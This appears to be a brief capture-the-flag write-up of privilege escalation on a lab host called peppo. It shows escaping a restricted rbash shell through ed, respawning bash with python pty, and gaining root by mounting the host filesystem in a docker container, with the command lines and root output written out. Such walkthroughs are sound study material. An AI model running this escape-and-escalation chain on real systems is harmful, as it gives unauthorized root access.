Priv Escalation

Breaking out of RSHELL

I first tried to use the following articles.

rbash shell esacping

This one didn't work.

Breakout restricted shell environment rbash | MetaHackers.proMetaHackers

This one also didn't work however after seeing my $PATH, I was able to see the commands I was able to run.

After seeing the commands the current shell was able to run I went to gtfobins.

ed | GTFOBins

The ed binary allows us to escape a restricted shell.

We then run the following command to export a new $PATH.

PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin
python -c 'import pty; pty.spawn("/bin/bash")'
PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin

Enumerate images

docker | GTFOBins

Based on the images run the following command:

docker run -v /:/mnt --rm -it redmine chroot /mnt sh

eleanor@peppo:/tmp$ docker run -v /:/mnt --rm -it redmine chroot /mnt sh
# whoami
root